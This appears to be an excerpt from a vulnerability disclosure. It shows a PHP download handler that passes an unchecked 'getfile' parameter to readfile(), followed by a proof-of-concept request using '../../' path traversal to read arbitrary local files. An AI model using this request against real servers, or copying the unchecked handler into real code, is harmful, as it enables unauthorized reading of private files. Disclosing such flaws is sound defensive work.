if ($_GET["getfile"]) { $filename = $_GET["filename"]; if (! $filename) $filename = "file"; header('Content-Disposition: attachment; filename="' . $filename . '"'); header("Content-type: application/octetstream"); header("Pragma: no-cache"); header("Expires: 0"); readfile($FILEROOT . $_GET["getfile"], "r+"); die(); }
filepresenter.loader.php?getfile=../../[local_file]&filename=wtf.txt